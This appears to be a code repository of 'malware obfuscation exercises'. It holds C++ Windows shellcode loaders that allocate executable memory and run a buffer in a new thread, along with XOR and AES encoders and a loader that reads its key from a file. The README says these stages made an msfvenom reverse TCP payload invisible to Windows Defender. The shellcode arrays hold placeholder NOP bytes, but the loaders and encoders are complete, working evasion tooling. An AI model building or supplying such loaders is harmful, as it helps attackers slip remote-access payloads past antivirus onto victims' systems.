├── 1BasicShellcodeLoader
    └── Source.cpp
├── 2BasicShellcodeInjectorWithEncoder
    └── Source.cpp
├── 2TripleXorEncoder
    └── Source.cpp
├── 3AESEncryptedShellcodeLoader
    └── Main.cpp
├── 3AESShellcodeCipher
    └── Main.cpp
├── 4AESShellcodeLoader_RetrieveKeyFromFile
    └── Main.cpp
├── 4GenerateKey
    └── Source.cpp
└── README.md


/1BasicShellcodeLoader/Source.cpp:
--------------------------------------------------------------------------------
 1 | #include <windows.h>
 2 | #include <stdio.h>
 3 | 
 4 | int main() {
 5 | 	// Change me!
 6 | 	unsigned char shellcode[] =
 7 | 	  { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
 8 | 
 9 | 	LPVOID basePageAddress;
10 | 
11 | 	// Allocate memory
12 | 	basePageAddress = VirtualAlloc(
13 | 		NULL,				//LPVOID lpAddress,
14 | 		(SIZE_T)sizeof(shellcode),	//SIZE_T dwSize,
15 | 		MEM_COMMIT | MEM_RESERVE,	//DWORD  flAllocationType,
16 | 		PAGE_EXECUTE_READWRITE		//DWORD  flProtect
17 | 	);
18 | 
19 | 	if (basePageAddress == NULL) {
20 | 		printf("[x] Could not allocate memory. Error: %d", GetLastError());
21 | 		return 1;
22 | 	}
23 | 
24 | 	// Write memory
25 | 	memcpy(
26 | 		basePageAddress,		//void *dest,
27 | 		&shellcode,			//const void *src,
28 | 		(size_t)sizeof(shellcode)	//size_t count
29 | 	);
30 | 
31 | 	// Create thread that points to shellcode
32 | 	CreateThread(
33 | 		NULL,						//LPSECURITY_ATTRIBUTES   lpThreadAttributes,
34 | 		NULL,						//SIZE_T                  dwStackSize,
35 | 		(LPTHREAD_START_ROUTINE)basePageAddress,	//LPTHREAD_START_ROUTINE  lpStartAddress,
36 | 		NULL,						//__drv_aliasesMem LPVOID lpParameter,
37 | 		0,						//DWORD                   dwCreationFlags,
38 | 		NULL						//LPDWORD                 lpThreadId
39 | 	);
40 | 
41 | 	// Wait for new thread to spawn
42 | 	Sleep(1000);
43 | 	
44 | 	
45 | 	return 0;
46 | }
47 | 


--------------------------------------------------------------------------------
/2BasicShellcodeInjectorWithEncoder/Source.cpp:
--------------------------------------------------------------------------------
 1 | #include <windows.h>
 2 | #include <stdio.h>
 3 | 
 4 | void TripleXor(unsigned char* buf, int size) {
 5 | 	const unsigned char encoderChar = '\x42';
 6 | 	for (int i = 0; i < size; i++) {
 7 | 		for (int j = 0; j < 3; j++)
 8 | 		{
 9 | 			buf[i] = buf[i] ^ (encoderChar + j);
10 | 		}
11 | 
12 | 	}
13 | }
14 | 
15 | int main() {
16 | 	// Change me! Pre-encoded shellcode 
17 | 	unsigned char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90";
18 | 
19 | 	LPVOID basePageAddress;
20 | 
21 | 	TripleXor(shellcode, sizeof(shellcode)-1);
22 | 
23 | 	// Allocate memory
24 | 	basePageAddress = VirtualAlloc( NULL, (SIZE_T)sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
25 | 
26 | 	if (basePageAddress == NULL) {
27 | 		printf("[x] Could not allocate memory. Error: %d", GetLastError());
28 | 		return 1;
29 | 	}
30 | 
31 | 	// Write memory
32 | 	memcpy( basePageAddress, &shellcode, (size_t)sizeof(shellcode) );
33 | 
34 | 	// Create thread that points to shellcode
35 | 	CreateThread( NULL, NULL, (LPTHREAD_START_ROUTINE)basePageAddress, NULL, 0, NULL ); 
36 | 
37 | 	//Wait for the new thread to spawn
38 | 	Sleep(1000);
39 | 	
40 | 	return 0;
41 | }
42 | 


--------------------------------------------------------------------------------
/2TripleXorEncoder/Source.cpp:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | 
 3 | void TripleXor(unsigned char* buf, int size) {
 4 | const char encoderChar = '\x42';
 5 | 	for (int i = 0; i < size; i++) {
 6 | 		for (int j = 0; j < 3; j++) {
 7 | 			buf[i] = buf[i] ^ (encoderChar + j);
 8 | 		}
 9 | 
10 | 	}
11 | }
12 | 
13 | void PrintHex(unsigned char* buf, int size) {
14 | 	printf("Buffer size: %d\n", size);
15 | 	printf("\"");
16 | 	for (int i = 0; i < size; i++) {
17 | 		if ((i % 16 == 15) && (i != size - 1)) {
18 | 			printf("\"\n\"");
19 | 		}
20 | 		printf("\\x");
21 | 		if (buf[i] < (unsigned char)'\x10') {
22 | 			printf("0");
23 | 		}
24 | 		printf("%x", buf[i]);
25 | 	}
26 | 	printf("\"\n");
27 | }
28 | 
29 | int main() {
30 | 	// Change me! msfvenom output here
31 | 	unsigned char buf[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
32 | 
33 | 	printf("Buffer before encoding:\n");
34 | 	PrintHex(buf, sizeof(buf)-1);
35 | 
36 | 	TripleXor(buf, sizeof(buf)-1);
37 | 	printf("Buffer after encoding:\n");
38 | 	PrintHex(buf, sizeof(buf)-1);
39 | 
40 | 	return 0;
41 | }
42 | 


--------------------------------------------------------------------------------
/3AESEncryptedShellcodeLoader/Main.cpp:
--------------------------------------------------------------------------------
 1 | #include <Windows.h>
 2 | #include "AES.h" // https://github.com/SergeyBel/AES
 3 | 
 4 | int main() {
 5 | 	// Change me! Pre-encrypted shellcode
 6 | 	unsigned char cipheredBuffer[] =
 7 | 	  { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
 8 | 
 9 | 	unsigned char key[] = { 0x43, 0x5e, 0x3b, 0xde, 0x6a, 0x10, 0x07, 0x3f, 0x3a, 0xf9, 0xa1, 0x5a, 0xd3, 0x11, 0x03, 0xd0 };
10 | 	unsigned int size = sizeof(cipheredBuffer);
11 | 
12 | 	// Decrypt payload
13 | 	AES aes(128);
14 | 	unsigned char* decipheredBuffer = aes.DecryptECB(cipheredBuffer, size, key);
15 | 
16 | 	// Allocate memory
17 | 	LPVOID basePageAddress = VirtualAlloc( NULL, (SIZE_T)size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
18 | 
19 | 	if (basePageAddress == NULL) {
20 | 		return 1;
21 | 	}
22 | 
23 | 	// Write memory
24 | 	memcpy( basePageAddress, decipheredBuffer, (size_t)size );
25 | 
26 | 	// Create thread that points to shellcode
27 | 	CreateThread( NULL, NULL, (LPTHREAD_START_ROUTINE)basePageAddress, NULL, 0, NULL ); 
28 | 
29 | 	//Wait for the new thread to spawn
30 | 	Sleep(1000);
31 | 	
32 | 	return 0;
33 | }
34 | 


--------------------------------------------------------------------------------
/3AESShellcodeCipher/Main.cpp:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include "AES.h" //https://github.com/SergeyBel/AES 
 3 | 
 4 | int main() {
 5 | 	// Change me! Shellcode from msfvenom here. Must be padded to be 16-byte aligned.
 6 | 	unsigned char shellcode[] = 
 7 | 	  { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
 8 | 
 9 | 	unsigned char key[] = { 0x43, 0x5e, 0x3b, 0xde, 0x6a, 0x10, 0x07, 0x3f, 0x3a, 0xf9, 0xa1, 0x5a, 0xd3, 0x11, 0x03, 0xd0 };
10 | 	unsigned int outLen = 0;
11 | 	unsigned int size = sizeof(shellcode);
12 | 
13 | 	AES aes(128);
14 | 
15 | 	printf("Before encryption:\n");
16 | 	aes.printHexArray(shellcode, size);
17 | 	printf("\n\n");
18 | 
19 | 	unsigned char* cipheredBuffer = aes.EncryptECB(shellcode, size, key, outLen);
20 | 
21 | 	printf("After encryption:\n");
22 | 	aes.printHexArray(cipheredBuffer, size);
23 | 	printf("\n\n");
24 | 
25 | 	unsigned char* decipheredBuffer = aes.DecryptECB(cipheredBuffer, size, key);
26 | 
27 | 	printf("After decryption:\n");
28 | 	aes.printHexArray(decipheredBuffer, size);
29 | 	printf("\n\n");
30 | 
31 | 	printf("Size of buffer: %d\n", size);
32 | 
33 | 	return 0;
34 | }
35 | 


--------------------------------------------------------------------------------
/4AESShellcodeLoader_RetrieveKeyFromFile/Main.cpp:
--------------------------------------------------------------------------------
 1 | #include <Windows.h>
 2 | #include "AES.h" // https://github.com/SergeyBel/AES
 3 | 
 4 | int main() {
 5 | 	// Change me! Pre-encrypted shellcode
 6 | 	unsigned char cipheredBuffer[] =
 7 | 	  { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
 8 | 
 9 | 	unsigned char key[0x10];
10 | 	FILE *f;
11 | 
12 | 	// Loading key from external file
13 | 	fopen_s(&f, "key.bin","rb");
14 | 	fread(key,sizeof(key),1,f);
15 | 	fclose(f);
16 | 
17 | 	unsigned int size = sizeof(cipheredBuffer);
18 | 
19 | 	// Decrypt payload
20 | 	AES aes(128);
21 | 	unsigned char* decipheredBuffer = aes.DecryptECB(cipheredBuffer, size, key);
22 | 
23 | 	// Allocate memory
24 | 	LPVOID basePageAddress = VirtualAlloc( NULL, (SIZE_T)size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
25 | 
26 | 	if (basePageAddress == NULL) {
27 | 		return 1;
28 | 	}
29 | 
30 | 	// Write memory
31 | 	memcpy( basePageAddress, decipheredBuffer, (size_t)size );
32 | 
33 | 	// Create thread that points to shellcode
34 | 	CreateThread( NULL, NULL, (LPTHREAD_START_ROUTINE)basePageAddress, NULL, 0, NULL ); 
35 | 
36 | 	//Wait for the thread to run
37 | 	Sleep(1000);
38 | 	
39 | 	return 0;
40 | }
41 | 


--------------------------------------------------------------------------------
/4GenerateKey/Source.cpp:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | 
 3 | int main() {
 4 | 	unsigned char key[] = { 0x43, 0x5e, 0x3b, 0xde, 0x6a, 0x10, 0x07, 0x3f, 0x3a, 0xf9, 0xa1, 0x5a, 0xd3, 0x11, 0x03, 0xd0 };
 5 | 
 6 | 	FILE* f;
 7 | 
 8 | 	fopen_s(&f, "key.bin", "wb");
 9 | 	fwrite(key, sizeof(key), 1, f);
10 | 	fclose(f);
11 | 
12 | 	return 0;
13 | }
14 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Stageless Malware Obfuscation Exercises
2 | These folders contain the different stages that took a basic **msfvenom** reverse TCP payload and made it invisible to **Windows Defender**.
3 | 


--------------------------------------------------------------------------------